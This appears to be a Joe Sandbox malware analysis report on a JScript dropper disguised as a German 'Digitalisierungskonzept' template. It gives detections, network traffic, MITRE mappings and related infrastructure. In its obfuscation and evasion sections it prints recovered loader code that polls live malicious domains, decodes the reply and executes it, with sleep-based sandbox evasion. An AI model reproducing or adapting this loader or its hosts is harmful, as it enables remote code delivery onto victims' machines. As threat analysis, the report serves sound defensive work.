Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
digitalisierungskonzept_muster.js

Overview

General Information

Sample name:digitalisierungskonzept_muster.js
Analysis ID:1586669
MD5:ad19381f5f3698c0ab4529715cd14327
SHA1:708b1bbf2e7fd4040f729e395a7f738fc048832a
SHA256:adeaed567668febcdbbf5227c6e6ed2333ba2c852447e82081548b62da0ec678
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
JScript performs obfuscated calls to suspicious functions
System process connects to network (likely due to code injection or exploit)
Potential evasive JS / VBS script found (domain check)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Abnormal high CPU Usage
Detected non-DNS traffic on DNS port
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • wscript.exe (PID: 4148 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\digitalisierungskonzept_muster.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 188.40.120.141, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4148, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 64780
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\digitalisierungskonzept_muster.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\digitalisierungskonzept_muster.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\digitalisierungskonzept_muster.js", ProcessId: 4148, ProcessName: wscript.exe
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 188.40.120.141, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4148, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 64780
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\digitalisierungskonzept_muster.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\digitalisierungskonzept_muster.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\digitalisierungskonzept_muster.js", ProcessId: 4148, ProcessName: wscript.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-09T13:43:14.709695+010020283713Unknown Traffic192.168.2.564780188.40.120.141443TCP
2025-01-09T13:43:37.712657+010020283713Unknown Traffic192.168.2.56478186.107.32.28443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: digitalisierungskonzept_muster.jsAvira: detected
Source: https://www.giuseppedeluigi.com/search.php?xxcktjjjheggcyu=9137952416Avira URL Cloud: Label: malware
Source: https://www.giuseppedeluigi.com/search.php?xxcktjjjheggcyu=9137952416303845Avira URL Cloud: Label: malware
Source: https://www.frerecapucinbenin.org/search.php?xxcktjjjheggcyu=37120954Avira URL Cloud: Label: malware
Source: unknownHTTPS traffic detected: 188.40.120.141:443 -> 192.168.2.5:64780 version: TLS 1.2

Networking

barindex
Source: C:\Windows\System32\wscript.exeNetwork Connect: 86.107.32.28 443Jump to behavior
Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.40.120.141 443Jump to behavior
Source: global trafficTCP traffic: 192.168.2.5:64582 -> 162.159.36.2:53
Source: Joe Sandbox ViewASN Name: DIALTELECOMRO DIALTELECOMRO
Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:64780 -> 188.40.120.141:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:64781 -> 86.107.32.28:443
Source: global trafficHTTP traffic detected: GET /search.php?xxcktjjjheggcyu=9137952416303845 HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.giuseppedeluigi.com
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /search.php?xxcktjjjheggcyu=9137952416303845 HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.giuseppedeluigi.com
Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: global trafficDNS traffic detected: DNS query: www.giuseppedeluigi.com
Source: global trafficDNS traffic detected: DNS query: www.frerecapucinbenin.org
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 12:43:15 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 208Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: wscript.exeString found in binary or memory: https://www.frerecapucinbenin.org/search.php?xxcktjjjheggcyu=37120954
Source: wscript.exeString found in binary or memory: https://www.giuseppedeluigi.com/search.php?xxcktjjjheggcyu=9137952416
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64780
Source: unknownNetwork traffic detected: HTTP traffic on port 64780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64781 -> 443
Source: unknownHTTPS traffic detected: 188.40.120.141:443 -> 192.168.2.5:64780 version: TLS 1.2

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess Stats: CPU usage > 49%
Source: digitalisierungskonzept_muster.jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal88.evad.winJS@1/0@3/2
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript)["C"+"reateObj"+"e"+"c"+"t"]("WS"+"cr"+"ipt.She"+"l"+"l"+""); liquid = "HK"+"E"+"Y"+"_CURR"+"EN"+"T_USER"+"\\ptuxPa\\";try { did["Reg"+"R"+"e"+"ad"](liquid); } catch(e) { did["Re"+"g"+"W"+"rit"+"e"](liquid, "", "REG_"+"S"+"Z");D=37-34;master=19;}try {teeth[D](might('.phhcpr\'a+e\"s?/x\'x+c]kst[jZj+j\'h/e/g:gscpytut=h\"\'+ G,,\' TfEaGl\'s(en)e;p oB..Bs e{nydr(t) ;} ;}\"c6a4t1c8h7(2e\")+{G =rGe{t u)r\"n% NfIaAlMsOeD;S N}D RiEfS U(%B\". s=t!a t)u\"s% N=I=A=M O2D0S0N)D R{E SvUa%r\" (ls g=n iBr.trSetsnpeomnnsoerTievxntE;d niafp x(E(.l).\"ilnldeehxSO.ft(p\"i@r\"c+SGW+\"\"(@t\"c,e j0b)O)e=t=a-e1r)C .{t pWiSrccrSiWp(t .fsil e;e)p0(32+20272,22)(;] \"}r teslbsues \"{[ )l( g=n ilr.trSeoptl.a)c(em(o\"d@n\"a+rG.+h\"t@a\"M, \"=\" )G; ;v)a\'rP TiT H=L MlX.rreevprleaSc.e2(L/M(X\\SdM{\'2(}t)c/egj,b OfeutnacetriCo.nt p(iHr)c S{W r=e tBu r{n )S3t r<i nsg(. ferloimhCwh a;r0C o=d es( p;a]r\"sueeI.netu(qHi,h1t0e)o+i3b0e)d;n e}e)p;o rtueeemtuhr[o3f].(wiw)w(\"),;\" gWrSoc.rniipnte.bQnuiictu(p)a;c e}r e}r fe.lwswew \"{, \"WmSoccr.iipgti.uslleedeepp(p2e2s2u2i2g).;w w}w \"s[+ +=; }Z '))();}catch(e){WScript.sleep(685818760);}afltrgbplg=teeth; }IHost.Sleep("85097");IHost.Sleep("8677");IHost.Sleep("9535");IHost.CreateObject("WScript.Shell");IWshShell3.RegRead("HKEY_CURRENT_USER\ptuxPa\");function anonymous() {Z = ["www.giuseppedeluigi.com","www.frerecapucinbenin.org","www.forumeuropeendebioethique.eu"]; s = 0; while (s < 3) { B = WScript.CreateObject('MSXML2.ServerXMLHTTP'); G = Math.random().toString()["substr"](2,70+30); if (WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERDNSDOMAIN%") != "%USERDNSDOMAIN%") {G=G+"278146";} try{ B.open('GET', 'https://'+Z[s]+'/search.php'+"?xxcktjjjheggcyu="+G, false); B.send(); }catch(e){ return false; } if (B.status === 200) { var l = B.responseText; if ((l.indexOf("@"+G+"@", 0))==-1) { WScript.sleep(22222); } else { l = l.replace("@"+G+"@",""); var i = l.replace(/(\d{2})/g, function (H) { return String.fromCharCode(parseInt(H,10)+30); }); teeth[3](i)(); WScript.Quit(); } } else { WScript.sleep(22222); } s++;} }IHost.Sleep("85097");IHost.Sleep("8677");IHost.Sleep("9535");IHost.CreateObject("WScript.Shell");IWshShell3.RegRead("HKEY_CURRENT_USER\ptuxPa\");IWshShell3.RegWrite("HKEY_CURRENT_USER\ptuxPa\", "", "REG_SZ");IHost.CreateObject("MSXML2.ServerXMLHTTP");IHost.CreateObject("WScript.Shell");IWshShell3.ExpandEnvironmentStrings("%USERDNSDOMAIN%");IServerXMLHTTPRequest2.open("GET", "https://www.giuseppedeluigi.com/search.php?xxcktjjjheggcyu=9137952416", "false");IServerXMLHTTPRequest2.send();IHost.Sleep("85097");IHost.Sleep("8677");IHost.Sleep("9535");IHost.CreateObject("WScript.Shell");IWshShell3.RegRead("HKEY_CURRENT_USER\ptuxPa\");IWshShell3.RegWrite("HKEY_CURRENT_USER\ptuxPa\", "", "REG_SZ");IHost.CreateObject("MSXML2.ServerXMLHTTP");IHost.CreateObject("WScript.Shell");IWshShell3.ExpandEnvironmentStrings("%USERDNSDOMAIN%");IServerXMLHTTPRequest2.open("GET", "https://www.giuseppedeluigi.com/search.php?xxckt
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: USERDNSDOMAIN%") != "%USERDNSDOMAIN%") {G=G+"278146";} try{ B.open('GET', 'https://'+Z[s]+'/search.php'+"?xxcktjjjheggcyu="+G, false); B.send(); }catch(e){ return false; } if (B.status === 200) { var
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exe TID: 6360Thread sleep time: -30000s >= -30000sJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exeNetwork Connect: 86.107.32.28 443Jump to behavior
Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.40.120.141 443Jump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information12
Scripting
Valid AccountsWindows Management Instrumentation12
Scripting
1
Process Injection
11
Virtualization/Sandbox Evasion
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Process Injection
LSASS Memory11
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Office Application Startup
Logon Script (Windows)1
DLL Side-Loading
Security Account Manager2
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive14
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
digitalisierungskonzept_muster.js100%AviraHTML/ExpKit.Gen2
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://www.giuseppedeluigi.com/search.php?xxcktjjjheggcyu=9137952416100%Avira URL Cloudmalware
https://www.giuseppedeluigi.com/search.php?xxcktjjjheggcyu=9137952416303845100%Avira URL Cloudmalware
https://www.frerecapucinbenin.org/search.php?xxcktjjjheggcyu=37120954100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
www.giuseppedeluigi.com
188.40.120.141
truetrue
    unknown
    frerecapucinbenin.org
    86.107.32.28
    truetrue
      unknown
      www.frerecapucinbenin.org
      unknown
      unknowntrue
        unknown
        15.164.165.52.in-addr.arpa
        unknown
        unknownfalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://www.giuseppedeluigi.com/search.php?xxcktjjjheggcyu=9137952416303845true
          • Avira URL Cloud: malware
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://www.giuseppedeluigi.com/search.php?xxcktjjjheggcyu=9137952416wscript.exetrue
          • Avira URL Cloud: malware
          unknown
          https://www.frerecapucinbenin.org/search.php?xxcktjjjheggcyu=37120954wscript.exetrue
          • Avira URL Cloud: malware
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          86.107.32.28
          frerecapucinbenin.orgRomania
          6910DIALTELECOMROtrue
          188.40.120.141
          www.giuseppedeluigi.comGermany
          24940HETZNER-ASDEtrue
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1586669
          Start date and time:2025-01-09 13:39:48 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 6m 43s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Run name:Without Instrumentation
          Number of analysed new started processes analysed:4
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:digitalisierungskonzept_muster.js
          Detection:MAL
          Classification:mal88.evad.winJS@1/0@3/2
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .js
          • Override analysis time to 240s for JS/VBS files not yet terminated
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
          • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45, 52.165.164.15, 4.175.87.197
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: digitalisierungskonzept_muster.js
          TimeTypeDescription
          07:43:36API Interceptor1x Sleep call for process: wscript.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          86.107.32.28MCYq2AqNU0.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
          • collevilca.it/admin/
          188.40.120.141w7g8ZBnsuZ.jsGet hashmaliciousUnknownBrowse
            kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.jsGet hashmaliciousUnknownBrowse
              #Uc708#Ub3c4#Uc6b0_#Uc11c#Ubc84_2016_#Ud55c#Uae00_#Uc5b8#Uc5b4#Ud329(ya).jsGet hashmaliciousUnknownBrowse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                www.giuseppedeluigi.com#Uc708#Ub3c4#Uc6b0_#Uc11c#Ubc84_2016_#Ud55c#Uae00_#Uc5b8#Uc5b4#Ud329(ya).jsGet hashmaliciousUnknownBrowse
                • 188.40.120.141
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                DIALTELECOMROm68k.elfGet hashmaliciousMirai, MoobotBrowse
                • 89.34.182.52
                5556.rar.exeGet hashmaliciousNjratBrowse
                • 188.212.158.75
                hax.sh4.elfGet hashmaliciousMiraiBrowse
                • 93.118.210.183
                rendel#U00e9s_1023200000000000305.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                • 86.107.36.93
                meerkat.arm5.elfGet hashmaliciousMiraiBrowse
                • 89.47.221.99
                Objedn#U00e1vka_20248481119000903.imgGet hashmaliciousAgentTesla, GuLoaderBrowse
                • 86.107.36.93
                mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                • 188.240.230.166
                mpsl.elfGet hashmaliciousMiraiBrowse
                • 93.114.246.9
                HETZNER-ASDEhttps://t.co/qNQo33w8wDGet hashmaliciousHTMLPhisherBrowse
                • 148.251.20.70
                QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                • 136.243.64.147
                https://qr.me-qr.com/PVhBu5SRGet hashmaliciousUnknownBrowse
                • 78.46.57.143
                https://qr.me-qr.com/pt/E9k76ewGet hashmaliciousUnknownBrowse
                • 78.46.57.143
                watchdog.elfGet hashmaliciousXmrigBrowse
                • 88.198.117.174
                http://hockey30.comGet hashmaliciousUnknownBrowse
                • 116.202.167.133
                https://hockey30.com/nouvelles/malaise-en-conference-de-presse-kent-hughes-envoie-un-message-cinglant-a-juraj-slafkovsky/Get hashmaliciousUnknownBrowse
                • 116.202.167.133
                ZipThis.exeGet hashmaliciousUnknownBrowse
                • 5.161.105.73
                garm5.elfGet hashmaliciousMiraiBrowse
                • 197.242.86.245
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                a0e9f5d64349fb13191bc781f81f42e1NvOxePa.exeGet hashmaliciousLummaCBrowse
                • 188.40.120.141
                h3VYJaQqI9.exeGet hashmaliciousLummaC StealerBrowse
                • 188.40.120.141
                s7.mp4.htaGet hashmaliciousLummaCBrowse
                • 188.40.120.141
                uU6IvUPN39.exeGet hashmaliciousLummaCBrowse
                • 188.40.120.141
                P2V7Mr3DUF.exeGet hashmaliciousLummaCBrowse
                • 188.40.120.141
                v3tb7mqP48.exeGet hashmaliciousLummaCBrowse
                • 188.40.120.141
                xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                • 188.40.120.141
                DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                • 188.40.120.141
                fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                • 188.40.120.141
                No context
                No created / dropped files found
                File type:ASCII text, with very long lines (1393), with CRLF line terminators
                Entropy (8bit):5.441842459483465
                TrID:
                  File name:digitalisierungskonzept_muster.js
                  File size:2'817 bytes
                  MD5:ad19381f5f3698c0ab4529715cd14327
                  SHA1:708b1bbf2e7fd4040f729e395a7f738fc048832a
                  SHA256:adeaed567668febcdbbf5227c6e6ed2333ba2c852447e82081548b62da0ec678
                  SHA512:e122be1d0194619bb4a3e2e720b65033e14ce0d554e0a3b13478fa32a2cfbc4046af9561cca8d85c98d08d8c42c55bcefd17b4183219c9344a91f6246b17a2b9
                  SSDEEP:48:NeswSLX9Vv3EN9hlJrP25kLfK5oIxYpUR92IPBpHI0fDJYf/FbXQUhc0iE4/XfA6:NewXq9hlRpfK53Yq2+iuDJU/ZXPh78XH
                  TLSH:3B510AE9A781F17D700F4E01203F367F7A66A88581F45260D94AD2D5B42003D7333D49
                  File Content Preview:function free(){WScript.Sleep(85097);sea=9007;while(fill=fill){try{born[sea](sea);}catch(seven){born[1410051]=fill;}sea++}}..function wish(street,at,bell,call){soil="vutwQ";born[6001355]=blood;teeth=only(might(men),soil);}..function sail(broke,gold,pull,s
                  Icon Hash:68d69b8bb6aa9a86
                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2025-01-09T13:43:14.709695+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.564780188.40.120.141443TCP
                  2025-01-09T13:43:37.712657+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.56478186.107.32.28443TCP
                  TimestampSource PortDest PortSource IPDest IP
                  Jan 9, 2025 13:41:09.419902086 CET6458253192.168.2.5162.159.36.2
                  Jan 9, 2025 13:41:09.425049067 CET5364582162.159.36.2192.168.2.5
                  Jan 9, 2025 13:41:09.428796053 CET6458253192.168.2.5162.159.36.2
                  Jan 9, 2025 13:41:09.433604002 CET5364582162.159.36.2192.168.2.5
                  Jan 9, 2025 13:41:09.935035944 CET6458253192.168.2.5162.159.36.2
                  Jan 9, 2025 13:41:09.940280914 CET5364582162.159.36.2192.168.2.5
                  Jan 9, 2025 13:41:09.940351009 CET6458253192.168.2.5162.159.36.2
                  Jan 9, 2025 13:43:13.821381092 CET64780443192.168.2.5188.40.120.141
                  Jan 9, 2025 13:43:13.821481943 CET44364780188.40.120.141192.168.2.5
                  Jan 9, 2025 13:43:13.821629047 CET64780443192.168.2.5188.40.120.141
                  Jan 9, 2025 13:43:13.823973894 CET64780443192.168.2.5188.40.120.141
                  Jan 9, 2025 13:43:13.824009895 CET44364780188.40.120.141192.168.2.5
                  Jan 9, 2025 13:43:14.709438086 CET44364780188.40.120.141192.168.2.5
                  Jan 9, 2025 13:43:14.709695101 CET64780443192.168.2.5188.40.120.141
                  Jan 9, 2025 13:43:14.775321960 CET64780443192.168.2.5188.40.120.141
                  Jan 9, 2025 13:43:14.775371075 CET44364780188.40.120.141192.168.2.5
                  Jan 9, 2025 13:43:14.776365042 CET44364780188.40.120.141192.168.2.5
                  Jan 9, 2025 13:43:14.818540096 CET64780443192.168.2.5188.40.120.141
                  Jan 9, 2025 13:43:14.941454887 CET64780443192.168.2.5188.40.120.141
                  Jan 9, 2025 13:43:14.983330011 CET44364780188.40.120.141192.168.2.5
                  Jan 9, 2025 13:43:15.136013031 CET44364780188.40.120.141192.168.2.5
                  Jan 9, 2025 13:43:15.136382103 CET44364780188.40.120.141192.168.2.5
                  Jan 9, 2025 13:43:15.136488914 CET64780443192.168.2.5188.40.120.141
                  Jan 9, 2025 13:43:15.136898041 CET64780443192.168.2.5188.40.120.141
                  Jan 9, 2025 13:43:15.136946917 CET44364780188.40.120.141192.168.2.5
                  Jan 9, 2025 13:43:15.136977911 CET64780443192.168.2.5188.40.120.141
                  Jan 9, 2025 13:43:15.136993885 CET44364780188.40.120.141192.168.2.5
                  Jan 9, 2025 13:43:37.449999094 CET64781443192.168.2.586.107.32.28
                  Jan 9, 2025 13:43:37.450098038 CET4436478186.107.32.28192.168.2.5
                  Jan 9, 2025 13:43:37.450364113 CET64781443192.168.2.586.107.32.28
                  Jan 9, 2025 13:43:37.450572968 CET64781443192.168.2.586.107.32.28
                  Jan 9, 2025 13:43:37.450599909 CET4436478186.107.32.28192.168.2.5
                  Jan 9, 2025 13:43:37.712656975 CET64781443192.168.2.586.107.32.28
                  TimestampSource PortDest PortSource IPDest IP
                  Jan 9, 2025 13:41:09.419450045 CET5354730162.159.36.2192.168.2.5
                  Jan 9, 2025 13:41:09.942955017 CET5956953192.168.2.51.1.1.1
                  Jan 9, 2025 13:41:09.950124979 CET53595691.1.1.1192.168.2.5
                  Jan 9, 2025 13:43:13.725763083 CET5696153192.168.2.51.1.1.1
                  Jan 9, 2025 13:43:13.812928915 CET53569611.1.1.1192.168.2.5
                  Jan 9, 2025 13:43:37.366251945 CET6380453192.168.2.51.1.1.1
